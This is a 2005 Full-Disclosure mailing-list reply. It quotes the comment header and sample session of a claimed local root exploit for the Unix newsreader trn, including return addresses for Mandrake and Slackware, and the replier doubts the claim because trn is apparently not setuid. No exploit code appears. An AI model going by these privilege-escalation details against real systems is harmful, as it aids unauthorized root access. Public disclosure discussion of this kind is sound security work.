+++ Z z a g o r R [Wed, Jan 26, 2005 at 09:27:28AM CET]:
> /*
> /usr/bin/trn local root exploit
> By ZzagorR - http://www.rootbinbash.com
> */
> /*
> sh-2.05b$ ./trn
> usage : ./trn ret buf
> example : ./trn 0xbfffff64
> [+] mandrake 9.2 = 0xbfffff96
> [+] slackware 10.0.0= 0xbfffff98
> [+] slackware 9.1.0= 0xbfffff84
> sh-2.05b$
> sh-2.05b$ ./trn 0xbfffff84 128
> [BOO %] 128
> [RET %] bfffff84
> sh-2.05b#
> sh-2.05b# id
> uid=0(root) gid=98(nobody) groups=98(nobody)

I didn't understand how you will get root? Afaik trn isn't suid. I didn't have Mandrake or another Linux here so I can't test it. Please explain.

Regards
Frank
--
In the beginning was the word and the word was content-type: text/plain
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
